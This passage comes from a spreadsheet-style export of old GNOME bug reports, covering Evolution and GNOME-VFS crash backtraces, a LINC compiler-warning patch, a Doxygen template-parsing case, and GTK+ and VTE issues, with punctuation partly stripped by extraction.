an error message and says Cannot create the specified folder: Generic
error.
To reproduce:
With a new IMAP account create a new base mail folder.  Then try to
create a new folder with the previous folder as its parent.
Unknown reporter: marcus.brubaker@utoronto.ca changed to bugbuddy-import@ximian.com.
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>marcus.brubaker</t>
  </si>
  <si>
    <t>LINC-103879</t>
  </si>
  <si>
    <t>Compiler warning fix</t>
  </si>
  <si>
    <t>See https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=82187
linc-protocols.c:419: warning: operation on `idx' may be undefined
Function parameter evaluation order is undefined.
Here is an untested patch to shut up the compiler
*** ./src/linc-protocols.c.old  2003-01-16 20:39:48.000000000 +0000
--- ./src/linc-protocols.c      2003-01-16 20:40:34.000000000 +0000
***************
*** 414422 ****
                gettimeofday (
                g_snprintf (buf sizeof (buf)
                            %s/linc-%x-%x-%x%x linc_tmpdir
!                           pid idx++
                            (guint) (rand() ^ t.tv_sec)
                            (guint) (idx ^ t.tv_usec))
  #ifdef CONNECTION_DEBUG
                if (g_file_test (buf G_FILE_TEST_EXISTS))
                        g_warning ('%s' already exists ! buf)
--- 414423 ----
                gettimeofday (
                g_snprintf (buf sizeof (buf)
                            %s/linc-%x-%x-%x%x linc_tmpdir
!                           pid idx
                            (guint) (rand() ^ t.tv_sec)
                            (guint) (idx ^ t.tv_usec))
+               idx++
  #ifdef CONNECTION_DEBUG
                if (g_file_test (buf G_FILE_TEST_EXISTS))
                        g_warning ('%s' already exists ! buf)</t>
  </si>
  <si>
    <t>MARLIN-149324</t>
  </si>
  <si>
    <t>Typos bug</t>
  </si>
  <si>
    <t>In the string below it's missing a separator after the period: add it.To remove.
#: src/libegg/egg-toolbar-editor.c:585
msgid Drag an item from the box above onto the toolbars to add it.To remove an
item drag it from the toolbars to the box above.</t>
  </si>
  <si>
    <t>DOXYGEN-139591</t>
  </si>
  <si>
    <t>doxygen can't handle complex c++ templates+inheritance (policies)</t>
  </si>
  <si>
    <t>file containing this code doesn't get documented
#ifndef POOL_WITH_STUPID_MONKEYS_ga
#define POOL_WITH_STUPID_MONKEYS_ga
#include state.cpp
#include input.cpp
#include selection.cpp
#include evaluate.cpp
#include matrix.cpp
#include tex.h
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
/*      *                                         *
      *                                         *
 ***  ****   ***   ***   ***  * * *  ***   ***  *   *  ****
*   * *   * *   * *   * *   * * * * *   * *   * *  *  *
***** *   * *   * *   * ***** * * * *   * *     ***    ***
*     *   * *   * *   * *     * * * *   * *     *  *      *
 **** ****   ***  *   *  ****  * *   ***  *     *   * ****  */
///////////////////////////////////////////////////////////////////////////////
extern int pool_size
extern int truncation_percentage
extern int tournament_size//must be smaller than the numeber of individuals in
a pool
extern int tournament_duration//this value to large causes premature convergence
///////////////////////////////////////////////////////////////////////////////
using std::vector
using std::string
using std::iterator
using std::pair
using std::make_pair
using psyche::matrix
using std::cerr
using std::endl
using std::flush
using std::ofstream
///////////////////////////////////////////////////////////////////////////////
#ifndef INDIVIDUAL
#define INDIVIDUAL
typedef float Fitness
//typedef pairFitness&gt; individual
#endif
#ifndef SHIT_damn
#define SHIT_damn
typedef pairFitness&gt; dumbobj
#endif
#ifndef BIT_STRING
#define BIT_STRING
typedef vector bit_string
#endif
///////////////////////////////////////////////////////////////////////////////
/*!
 *   Genepools need to:
 *
 * -get input from a file
 * -evolve and evaluate (Evoluate) a pool
 * -select beasts from the pool
 *
 * for handy declaration purposes the
 * policy pluggable parameters from the
 * state object can be set when declaring
 * a genepool it is also possible to adjust the
 * definition to also leave the state object implicit
 * this has not been done so it is now a evolutionairy
 * algorhitm for binary representations
 */
template &lt;
          template  class Input=parse_graph_fast
          template  class fitclass
classclass&gt; class Selection=truncation
          template  class Crossover=hamming_one_point//these allready 
(state.cpp)
          template  class Mutant=simple_mutation////////  have default
values
          template  class Evoluation=fast_cut_size
          class Gene=bit_string
          class Adjecency_list_type=vector &gt;
          class Input_storage_type=matrix
         &gt;
class genepool:public Input
               public
SelectionFitness&gt;EvoluationGene
Input_storage_type Adjecency_list_type&gt;
               public virtual
EvoluationFitness&gt;
Input_storage_typeAdjecency_list_type &gt;
{private:
 /*!here as many possible solutions in the form of a
  * state-Fitness_off_that_state pair as you want are
  * stored in a vector
  */
 vectorFitness&gt; &gt; pool
 public:
 int size
 /*!report the cutsize*/
 Fitness report()
 {return pool[0].second
 }
 /*! constructor that does nothing*/
 genepool(){}
 /*!
  * this initializes the genepool using information
  * which is delivered by the input policy
  */
 void init(string file)
 {size=read(file)
  /* initialize pool_size individuals as follows:*/
  if (!(size%2))
    {
    for (int a=0a&lt;pool_sizea++)
      {/* initialize the Input_storage_type with
        * half positive and half negative values in a
        * random fashion
        */
       Gene x(size)
       state y
       int cuma=0
       int cumb=0
       for(int aa=0aa&lt;sizeaa++)
       {if(cuma*2 &lt; size &amp;&amp; cumb*2 &lt; size)
        {
         if(rand()%2)
            {x[aa]=true
             cuma++
            }
         else {x[aa]=false
               cumb++
              }
        }
        else if(cumb*2&lt;size)x[aa]=false
        else if(cuma*2&lt;size)x[aa]=true
        else { cerr &lt;&lt; gene not randomly initialized due to odd gene? &lt;&lt; endl
&lt;&lt; flush
               exit(1)
              }
       }
       y.set(x)
       /*initial fitness is very unpleasant initialy*/
       pool.push_back(make_pair(y(size*size)+1))
      }
    }
  else cerr &lt;&lt; One cannot bipartition graphs with an odd number of vertices...\n
 }
 /*!
  * this does an evolution step it moves from one generation
  * to the next
  */
 void evolve()
 {pool=select(poolgraphfast_offsets)
 }
 /*!
  * this tells you if we've got a valid graph in our genepool
  */
 bool winner(){return pool[0].first.balanced()}
 /*!
  *this isn't implemented
  */
 string print()
 /*!
  * this thing makes you a file which can be used to generate
  * a plotted graph using AT&amp;T's graphviz
  */
 void dot(string p=bipartitionedchar * filename=bipart.dot)
 {ofstream output(stringcombineer(filename.dot))
  if(!output) {cerr &lt;&lt; can't open file bipart.dot &lt;&lt; endl &lt;&lt; flush
              exit(1)
             }
  output &lt;&lt; Digraph partition {  &lt;&lt; endl
        output &lt;&lt; concentrate=true &lt;&lt; endl
        output &lt;&lt; compound=\true\ &lt;&lt; endl
        output &lt;&lt; label= &lt;&lt; p &lt;&lt;   &lt;&lt; endl
        output &lt;&lt; nodesep=\.01\ &lt;&lt; endl
        //output &lt;&lt; ranksep=\0.1 equally\ &lt;&lt; endl
        output &lt;&lt; ranksep=\.01\ &lt;&lt; endl
        output &lt;&lt; size=\107.5\  &lt;&lt; endl
        output &lt;&lt; center=\true\ &lt;&lt; endl
        /*!subgraph one*/
        output &lt;&lt; subgraph clusterone { &lt;&lt; endl
        output &lt;&lt; label=\first graph\ &lt;&lt; endl
        output &lt;&lt; color=\black\ &lt;&lt; endl
        output &lt;&lt; style=\filled\ &lt;&lt; endl
        output &lt;&lt; color=\sandybrown\ &lt;&lt; endl
        for(int a=0a&lt;sizea++)
            {if(pool[0].first[a])
                {char * vertex=add(vertexint2char(a))
                 output &lt;&lt;  stringcombineer(vertex 
[style=filledcolor=greenshape=circle] \n)
                }
            }
        /*end subgraph one*/
        output &lt;&lt; } &lt;&lt; endl
        /*subgraph 2*/
        output &lt;&lt; subgraph clustertwo { &lt;&lt; endl
        output &lt;&lt; label=\second graph\ &lt;&lt; endl
        output &lt;&lt; color=\black\ &lt;&lt; endl
        output &lt;&lt; style=\filled\ &lt;&lt; endl
        output &lt;&lt; color=\green\ &lt;&lt; endl
        for(int a=0a&lt;sizea++)
            {if(!(pool[0].first[a]))
                {char * vertex=add(vertexint2char(a))
                 output &lt;&lt; stringcombineer(vertex 
[style=filledcolor=sandybrownshape=circle] \n)
                }
            }
        output &lt;&lt; } &lt;&lt; endl
        for (int d=0d&lt;sized++)
        for (int aa=0aa&lt;sizeaa++)
                    {char * vertex=add(vertexint2char(d))
                     if((*graph)(daa))
                        {char * vortex=add(vertexint2char(aa))
                         output  )add(vortex \n))
                        }
                    }
        /*end subgraph 2*/
        output &lt;&lt; } &lt;&lt; endl
        output.close()
 }
}
#endif</t>
  </si>
  <si>
    <t>specialunderwear</t>
  </si>
  <si>
    <t>EVOLUTION-245288</t>
  </si>
  <si>
    <t>crash in do_message_selected</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: critical
Version: GNOME2.2.2 1.4.0
os_details: Ximian Inc.
Synopsis: crash in do_message_selected
Bugzilla-Product: Evolution
Bugzilla-Component: Calendar
BugBuddy-GnomeVersion: 2.0 (2.2.0.1)
Description:
as of a couple of days ago my mailer has started crashing a lot in
do_message_selected while I am reading mail
Debugging Information:
Backtrace was generated from '/usr/bin/evolution-1.4'
[New Thread 1024 (LWP 23788)]
[New Thread 2049 (LWP 23791)]
[New Thread 1026 (LWP 23792)]
[New Thread 2051 (LWP 23793)]
[New Thread 3076 (LWP 23794)]
[New Thread 4101 (LWP 23795)]
[New Thread 6150 (LWP 23816)]
0x410814d9 in wait4 () from /lib/libc.so.6
#0  0x410814d9 in wait4 () from /lib/libc.so.6
#1  0x410f930c in __DTOR_END__ () from /lib/libc.so.6
#2  0x4007183a in waitpid () from /lib/libpthread.so.0
#3  0x40372d65 in libgnomeui_module_info_get () from
/usr/lib/libgnomeui-2.so.0
#4  0x08092335 in segv_redirect (sig=11) at main.c:500
#5  0x4006f307 in pthread_sighandler () from /lib/libpthread.so.0
#6  
#7  0x4104fe9c in strcmp () from /lib/libc.so.6
#8  0x413521a7 in do_message_selected (fb=0x83bee10) at
folder-browser.c:2476
#9  0x40f94f4c in g_main_context_wakeup () from
/usr/lib/libglib-2.0.so.0
#10 0x40f92ab6 in g_get_current_time () from /usr/lib/libglib-2.0.so.0
#11 0x40f938cd in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#12 0x40f93c60 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#13 0x40f94306 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#14 0x404948ea in bonobo_main () from /usr/lib/libbonobo-2.so.0
#15 0x0809271c in main (argc=1 argv=0xbffff9c4) at main.c:637
#16 0x40fee1c4 in __libc_start_main () from /lib/libc.so.6
Thread 7 (Thread 6150 (LWP 23816)):
#0  0x40fff136 in sigsuspend () from /lib/libc.so.6
No symbol table info available.
#1  0x4006ea61 in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x4006aea8 in pthread_cond_wait () from /lib/libpthread.so.0
No symbol table info available.
#3  0x401344d3 in e_msgport_wait (mp=0x81ab388) at e-msgport.c:302
	_buffer = {__routine = 0x401342b8  
  __arg = 0x81ab388 __canceltype = 0 __prev = 0x0}
	msg = (EMsg *) 0xbefffa4c
#4  0x40134bec in thread_dispatch (din=0x81ad3f0) at e-msgport.c:665
	e = (EThread *) 0x81ad3f0
	m = (EMsg *) 0x0
	info = (struct _thread_info *) 0xfffffffc
	self = 6150
#5  0x4006bf77 in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
Thread 6 (Thread 4101 (LWP 23795)):
#0  0x40fff136 in sigsuspend () from /lib/libc.so.6
No symbol table info available.
#1  0x4006ea61 in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x4006aea8 in pthread_cond_wait () from /lib/libpthread.so.0
No symbol table info available.
#3  0x401344d3 in e_msgport_wait (mp=0x41a8f390) at e-msgport.c:302
	_buffer = {__routine = 0x401342b8  
  __arg = 0x41a8f390 __canceltype = -1088423308 __prev = 0x0}
	msg = (EMsg *) 0xbf1ffa4c
#4  0x40134bec in thread_dispatch (din=0x41e9b820) at e-msgport.c:665
	e = (EThread *) 0x41e9b820
	m = (EMsg *) 0x0
	info = (struct _thread_info *) 0xfffffffc
	self = 4101
#5  0x4006bf77 in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
Thread 5 (Thread 3076 (LWP 23794)):
#0  0x40fff136 in sigsuspend () from /lib/libc.so.6
No symbol table info available.
#1  0x4006ea61 in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x4006aea8 in pthread_cond_wait () from /lib/libpthread.so.0
No symbol table info available.
#3  0x401344d3 in e_msgport_wait (mp=0x81ab388) at e-msgport.c:302
	_buffer = {__routine = 0x401342b8  
  __arg = 0x81ab388 __canceltype = 0 __prev = 0x0}
	msg = (EMsg *) 0xbf3ffa4c
#4  0x40134bec in thread_dispatch (din=0x81ad3f0) at e-msgport.c:665
	e = (EThread *) 0x81ad3f0
	m = (EMsg *) 0x0
	info = (struct _thread_info *) 0xfffffffc
	self = 3076
#5  0x4006bf77 in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
Thread 4 (Thread 2051 (LWP 23793)):
#0  0x40fff136 in sigsuspend () from /lib/libc.so.6
No symbol table info available.
#1  0x4006ea61 in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x4006aea8 in pthread_cond_wait () from /lib/libpthread.so.0
No symbol table info available.
#3  0x401344d3 in e_msgport_wait (mp=0x81ad3b0) at e-msgport.c:302
	_buffer = {__routine = 0x401342b8  
  __arg = 0x81ad3b0 __canceltype = 0 __prev = 0x0}
	msg = (EMsg *) 0xbf5ffa4c
#4  0x40134bec in thread_dispatch (din=0x81b0f00) at e-msgport.c:665
	e = (EThread *) 0x81b0f00
	m = (EMsg *) 0x0
	info = (struct _thread_info *) 0xfffffffc
	self = 2051
#5  0x4006bf77 in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
Thread 3 (Thread 1026 (LWP 23792)):
#0  0x40fff136 in sigsuspend () from /lib/libc.so.6
No symbol table info available.
#1  0x4006ea61 in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x4006aea8 in pthread_cond_wait () from /lib/libpthread.so.0
No symbol table info available.
#3  0x401344d3 in e_msgport_wait (mp=0x81b19b0) at e-msgport.c:302
	_buffer = {__routine = 0x401342b8  
  __arg = 0x81b19b0 __canceltype = 0 __prev = 0x0}
	msg = (EMsg *) 0xbf7ffa4c
#4  0x40134bec in thread_dispatch (din=0x81b1ca0) at e-msgport.c:665
	e = (EThread *) 0x81b1ca0
	m = (EMsg *) 0x0
	info = (struct _thread_info *) 0xfffffffc
	self = 1026
#5  0x4006bf77 in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
Thread 2 (Thread 2049 (LWP 23791)):
#0  0x410abb60 in poll () from /lib/libc.so.6
No symbol table info available.
#1  0x4006bcda in __pthread_manager () from /lib/libpthread.so.0
No symbol table info available.
Thread 1 (Thread 1024 (LWP 23788)):
#0  0x410814d9 in wait4 () from /lib/libc.so.6
No symbol table info available.
#1  0x410f930c in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x4007183a in waitpid () from /lib/libpthread.so.0
No symbol table info available.
#3  0x40372d65 in libgnomeui_module_info_get () from
/usr/lib/libgnomeui-2.so.0
No symbol table info available.
#4  0x08092335 in segv_redirect (sig=11) at main.c:500
	sig = 11
#5  0x4006f307 in pthread_sighandler () from /lib/libpthread.so.0
No symbol table info available.
#6  
No symbol table info available.
#7  0x4104fe9c in strcmp () from /lib/libc.so.6
No symbol table info available.
#8  0x413521a7 in do_message_selected (fb=0x83bee10) at
folder-browser.c:2476
	fb = (FolderBrowser *) 0x0
#9  0x40f94f4c in g_main_context_wakeup () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#10 0x40f92ab6 in g_get_current_time () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#11 0x40f938cd in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#12 0x40f93c60 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#13 0x40f94306 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#14 0x404948ea in bonobo_main () from /usr/lib/libbonobo-2.so.0
No symbol table info available.
#15 0x0809271c in main (argc=1 argv=0xbffff9c4) at main.c:637
	argc = -1073743808
	options = {{longName = 0x80b72c0 no-splash shortName = 0 '\0' 
    argInfo = 0 arg = 0x80bc048 val = 0 
    descrip = 0x80b72ca Disable splash screen argDescrip = 0x0} {
    longName = 0x80b0ad4 offline shortName = 0 '\0' argInfo = 0 
    arg = 0x80bc050 val = 0 descrip = 0x80b72e0 Start in offline
mode 
    argDescrip = 0x0} {longName = 0x80b45fd online shortName = 0
'\0' 
    argInfo = 0 arg = 0x80bc04c val = 0 
    descrip = 0x80b72f6 Start in online mode argDescrip = 0x0} {
    longName = 0x80b730b force-shutdown shortName = 0 '\0' argInfo =
0 
    arg = 0x80bc058 val = 0 
    descrip = 0x80b7620 Forcibly shut down all evolution components 
    argDescrip = 0x0} {longName = 0x80b731a debug shortName = 0
'\0' 
    argInfo = 1 arg = 0x80be350 val = 0 
    descrip = 0x80b7660 Send the debugging output of all components to
a file. argDescrip = 0x0} {longName = 0x80b7320 setup-only
shortName = 0 '\0' 
    argInfo = 1073741824 arg = 0x80bc054 val = 0 descrip = 0x0 
    argDescrip = 0x0} {longName = 0x0 shortName = 0 '\0' argInfo = 4
    arg = 0x40547804 val = 0 descrip = 0x80b732b Help options: 
    argDescrip = 0x0} {longName = 0x0 shortName = 0 '\0' argInfo = 0
    arg = 0x0 val = 0 descrip = 0x0 argDescrip = 0x0}}
	uri_list = (GSList *) 0x0
	popt_context_value = {g_type = 0 data = {{v_int = 0 v_uint = 0 
      v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 
      v_double = 0 v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long =
0 
      v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0
      v_pointer = 0x0}}}
	program = (GnomeProgram *) 0x80c6738
	popt_context = 0x8092314
	args = (char **) 0x8092314
#16 0x40fee1c4 in __libc_start_main () from /lib/libc.so.6
No symbol table info available.
#0  0x410814d9 in wait4 () from /lib/libc.so.6
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>GTK+-149404</t>
  </si>
  <si>
    <t>decimal separator in numpad useless with swiss (german?) keyboard</t>
  </si>
  <si>
    <t>This is an issue with Swiss keyboards (and I guess German too and some others).
The decimal separator is  in these countries while the numerical keypad
separator is labeled .. In Gimp2 this key cannot be used in numerical-input
widgets (spin buttons?). However this key is meant to be the decimal separator.
steps to reproduce:
- create a new image
- set the size (or resolution) to a non-integer value using only the numerical
keypad for example 10.5 mm
expected result: size is set to 105
actual result: size is set to 105
At first I thought this was a GTK2 issue but other GTK2 applications correctly
interpret this key as the decimal separator (Gnumeric Inkscape Gcalc dia).
Maybe it is a gtk2 bug and these apps use a workaround I do not know.
GTK is 2.4.3
This is tested on both 2.0.3 and 2.1.2 versions of gimp.</t>
  </si>
  <si>
    <t>EKIGA-430870</t>
  </si>
  <si>
    <t>SDP connection</t>
  </si>
  <si>
    <t>Please describe the problem:
you might consider using the SDP connection information from media-level instead of session level if present.. 
http://mail.gnome.org/archives/ekiga-devel-list/2007-January/msg00063.html
Steps to reproduce:
1. use of openser with 
2. rtpproxy
Actual results:
no media connection can be made
Expected results:
a media connection could be made
Does this happen every time?
yes
Other information:</t>
  </si>
  <si>
    <t>mack.stout</t>
  </si>
  <si>
    <t>EVOLUTION-257136</t>
  </si>
  <si>
    <t>eds crash on appointment drag</t>
  </si>
  <si>
    <t>Description of Problem: 
EDS crashed when tried to drag an appointment in caleder day view. 
Steps to reproduce the problem: 
1. Drag any appointment in calender to another time slot.  
2.  
3.  
Actual Results: 
crash 
Expected Results: 
appointment should go to new time slot. 
How often does this happen?  
once so far 
Additional Information: 
back trace in gdb &gt;&gt; 
#0  0x401e3a4c in icalparser_string_line_generator (out=0x81b3d1c  
    buf_size=80 d=0x42c5fa4c) at icalparser.c:1061 
#1  0x401e2be4 in icalparser_get_line (parser=0x81b3d10 
    line_gen_func=0x401e3a1b ) 
    at icalparser.c:461 
#2  0x401e2e28 in icalparser_parse (parser=0x81b3d10 
    line_gen_func=0x401e3a1b ) 
    at icalparser.c:573 
#3  0x401e3b54 in icalparser_parse_string (str=0x0) at icalparser.c:1104 
#4  0x401db880 in icalcomponent_new_from_string (str=0x0) 
    at icalcomponent.c:173 
#5  0x40074033 in e_cal_backend_notify_object_modified 
(backend=0x80dde18 
    old_object=0x0 
    object=0x81a4271 BEGIN:VEVENT
\nUID:20040416T133642Z-7084-100-6389-27@linux\nDTSTAMP:20040416T005334
\nX-EVOLUTION-GROUPWISE-ID:407FC93E.provo.research.100.1763071.1.BF.1@4:
\n A.provo.research.100.0.1.0.1@19\nSUMMARY:app2\nCR...) 
    at e-cal-backend.c:1052 
#6  0x4007b698 in e_data_cal_notify_object_modified (cal=0x8161bc8 
    status=GNOME_Evolution_Calendar_Success old_object=0x0 
    object=0x81a4271 BEGIN:VEVENT
\nUID:20040416T133642Z-7084-100-6389-27@linux\nDTSTAMP:20040416T005334
\nX-EVOLUTION-GROUPWISE-ID:407FC93E.provo.research.100.1763071.1.BF.1@4:
\n A.provo.research.100.0.1.0.1@19\nSUMMARY:app2\nCR...) 
    at e-data-cal.c:812 
---Type  to continue or q  to quit--- 
#7  0x40078b8b in _e_cal_backend_modify_object (backend=0x80dde18 
    cal=0x8161bc8 
    calobj=0x81a4271 BEGIN:VEVENT
\nUID:20040416T133642Z-7084-100-6389-27@linux\nDTSTAMP:20040416T005334
\nX-EVOLUTION-GROUPWISE-ID:407FC93E.provo.research.100.1763071.1.BF.1@4:
\n A.provo.research.100.0.1.0.1@19\nSUMMARY:app2\nCR... 
    mod=CALOBJ_MOD_ALL) at e-cal-backend-sync.c:371 
#8  0x40073094 in e_cal_backend_modify_object (backend=0x80dde18 
    cal=0x8161bc8 
    calobj=0x81a4271 BEGIN:VEVENT
\nUID:20040416T133642Z-7084-100-6389-27@linux\nDTSTAMP:20040416T005334
\nX-EVOLUTION-GROUPWISE-ID:407FC93E.provo.research.100.1763071.1.BF.1@4:
\n A.provo.research.100.0.1.0.1@19\nSUMMARY:app2\nCR... 
    mod=CALOBJ_MOD_ALL) at e-cal-backend.c:823 
#9  0x40079bed in impl_Cal_modifyObject (servant=0x8161bdc 
    calobj=0x81a4271 BEGIN:VEVENT
\nUID:20040416T133642Z-7084-100-6389-27@linux\nDTSTAMP:20040416T005334
\nX-EVOLUTION-GROUPWISE-ID:407FC93E.provo.research.100.1763071.1.BF.1@4:
\n A.provo.research.100.0.1.0.1@19\nSUMMARY:app2\nCR... 
    mod=7 ev=0x42c5fdbc) at e-data-cal.c:307 
#10 0x4006c70f in 
_ORBIT_skel_small_GNOME_Evolution_Calendar_Cal_modifyObject ( 
    _o_servant=0x8161bdc _o_retval=0x0 _o_args=0x42c5fc8c 
    _o_ctx=0x42c5fcec _o_ev=0x42c5fdbc 
    _impl_modifyObject=0x40079b9d ) 
    at Evolution-DataServer-Calendar-common.c:320 
#11 0x40791b34 in ORBit_POA_setup_root () from /opt/gnome/lib/
libORBit-2.so.0 
---Type  to continue or q  to quit--- 
#12 0x40796b51 in ORBit_OAObject_invoke () from /opt/gnome/lib/
libORBit-2.so.0 
#13 0x4077f008 in ORBit_small_invoke_adaptor () 
   from /opt/gnome/lib/libORBit-2.so.0 
#14 0x40792048 in ORBit_recv_buffer_return_sys_exception () 
   from /opt/gnome/lib/libORBit-2.so.0 
#15 0x40792260 in ORBit_recv_buffer_return_sys_exception () 
   from /opt/gnome/lib/libORBit-2.so.0 
#16 0x40777e86 in giop_thread_queue_process () 
   from /opt/gnome/lib/libORBit-2.so.0 
#17 0x40777569 in giop_thread_same_key () from /opt/gnome/lib/
libORBit-2.so.0 
#18 0x408b2569 in g_thread_pool_thread_proxy () 
   from /opt/gnome/lib/libglib-2.0.so.0 
#19 0x408b111d in g_thread_create_proxy () from /opt/gnome/lib/
libglib-2.0.so.0 
#20 0x407fef60 in pthread_start_thread () from /lib/i686/libpthread.so.0 
#21 0x407ff0fe in pthread_start_thread_event () from /lib/i686/
libpthread.so.0 
#22 0x409bd327 in clone () from /lib/i686/libc.so.6</t>
  </si>
  <si>
    <t>chkumar</t>
  </si>
  <si>
    <t>GNOME-VFS-90035</t>
  </si>
  <si>
    <t>Crash of Application on startup</t>
  </si>
  <si>
    <t xml:space="preserve">Package: gnome-games
Severity: normal
Version: 1.93.0
Synopsis: Crash of Application on startup
Bugzilla-Product: gnome-games
Bugzilla-Component: freecell
Description:
Starting the application on solaris 8 crashes every time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sol-thread active.
0xfe09c07c in ___lwp_cond_wait () from /usr/lib/libc.so.1
#0  0xfe09c07c in ___lwp_cond_wait () from /usr/lib/libc.so.1
#1  0xfe2490e4 in _age () from /usr/lib/libthread.so.1
#2  0xfe24a778 in _lwp_start () from /usr/lib/libthread.so.1
Thread 5 (LWP    4        ):
#0  0xfe09c07c in ___lwp_cond_wait () from /usr/lib/libc.so.1
#1  0xfe2490e4 in _age () from /usr/lib/libthread.so.1
#2  0xfe24a778 in _lwp_start () from /usr/lib/libthread.so.1
Thread 4 (LWP    4        ):
#0  0xfe09c07c in ___lwp_cond_wait () from /usr/lib/libc.so.1
#1  0xfe2490e4 in _age () from /usr/lib/libthread.so.1
#2  0xfe24a778 in _lwp_start () from /usr/lib/libthread.so.1
Thread 3 (LWP    3        ):
#0  0xfe0995bc in door_restart () from /usr/lib/libc.so.1
Thread 2 (LWP    2        ):
#0  0xfe09ba18 in _signotifywait () from /usr/lib/libc.so.1
#1  0xfe24ed98 in _dynamiclwps () from /usr/lib/libthread.so.1
Thread 1 (LWP    1        ):
#0  0xfe09c65c in _waitid () from /usr/lib/libc.so.1
#1  0xfe056698 in _waitpid () from /usr/lib/libc.so.1
#2  0xfe25ab08 in waitpid () from /usr/lib/libthread.so.1
#3  0xfe25b834 in __sighndlr () from /usr/lib/libthread.so.1
#4  
#5  0xfe0e6644 in _doprnt () from /usr/ucblib/libucb.so.1
#6  0xfe0e8850 in vsprintf () from /usr/ucblib/libucb.so.1
#7  0xfe1b0e7c in g_strdup_printf () from /opt/gnome-2.0/lib/libglib-2.0.so.0
#8  0xfe64e20c in gnome_vfs_configuration_init ()
   from /opt/gnome-2.0/lib/libgnomevfs-2.so.0
#9  0xfe6522dc in gnome_vfs_init () from /opt/gnome-2.0/lib/libgnomevfs-2.so.0
#10 0xfeff33a4 in gnome_program_initv ()
   from /opt/gnome-2.0/lib/libgnome-2.so.0
#11 0xfeff2948 in gnome_program_init () from /opt/gnome-2.0/lib/libgnome-2.so.0
#12 0x1aab4 in main ()
#0  0xfe09c07c in ___lwp_cond_wait () from /usr/lib/libc.so.1
#0  0xfe09c07c in ___lwp_cond_wait () from /usr/lib/libc.so.1
No symbol table info available.
#1  0xfe2490e4 in _age () from /usr/lib/libthread.so.1
No symbol table info available.
#2  0xfe24a778 in _lwp_start () from /usr/lib/libthread.so.1
No symbol table info available.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2002-08-06 15:19 -------
The original reporter (longariva@softbaer.de) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component gnome-games-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>longariva</t>
  </si>
  <si>
    <t>GTK+-60606</t>
  </si>
  <si>
    <t>automatically set locale</t>
  </si>
  <si>
    <t>gtk_init() should set the locale by default. We could have some 
override if required (gtk_do_not_set_locale()?)
Failure to call gtk_set_locale() is pretty FAQ-causing.</t>
  </si>
  <si>
    <t>VTE-107031</t>
  </si>
  <si>
    <t>device-control-string error</t>
  </si>
  <si>
    <t>If I use gnome-terminal compiled with vte (tested with 0.17 and 0.20) and
start up vim I get these errors in .xsession-errors:
** (gnome-terminal:19064): WARNING **: No handler for control sequence
`device-control-string' defined.
These are repeated several times each time I use vim.  I have seen a couple
of gnome-terminal crashes and not sure if it is related.
I don't see the problem when compiling gnome-terminal against libzvt2.</t>
  </si>
  <si>
    <t>EVOLUTION-210602</t>
  </si>
  <si>
    <t>Crash trying to delete vfolder</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 0.13.99
Synopsis: Crash trying to delete vfolder
Bugzilla-Product: Evolution
Bugzilla-Component: Shell
Description:
Crash when trying to delete vfolder created automaticly from filter
rule!
Debugging Information:
[New Thread 1024 (LWP 1123)]
[New Thread 2049 (LWP 1133)]
[New Thread 1026 (LWP 1134)]
[New Thread 2051 (LWP 1135)]
[New Thread 5124 (LWP 1154)]
0x40b1ef19 in __wait4 () from /lib/i686/libc.so.6
#0  0x40b1ef19 in __wait4 () from /lib/i686/libc.so.6
#1  0x40b997e4 in __DTOR_END__ () from /lib/i686/libc.so.6
#2  0x406cc543 in waitpid (pid=1603 stat_loc=0xbfffea1c options=0)
    at wrapsyscall.c:172
#3  0x402fa262 in gnome_segv_handle (signum=11) at gnome-init.c:659
#4  0x080965ea in segv_redirect (sig=11) at main.c:67
#5  0x406ca905 in pthread_sighandler (signo=11 ctx=
      {gs = 7 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 2110 edi = 0 esi = 139236816 ebp = 3221220856 esp = 3221220832 ebx = 1079633548 edx = 138333792 ecx = 139610408 eax = 0 trapno = 14 err = 4 eip = 1079550126 cs = 35 __csh = 0 eflags = 2163335 esp_at_signal = 3221220832 ss = 43 __ssh = 0 fpstate = 0xbfffeb60 oldmask = 2147483648 cr2 = 0})
    at signals.c:97
#6  
#7  0x4058a0ae in g_hash_table_foreach (hash_table=0x8524928 
    func=0x8098220  user_data=0x84bec20) at ghash.c:299
#8  0x0809826d in clear_tree (ml=0x84bec20) at message-list.c:1286
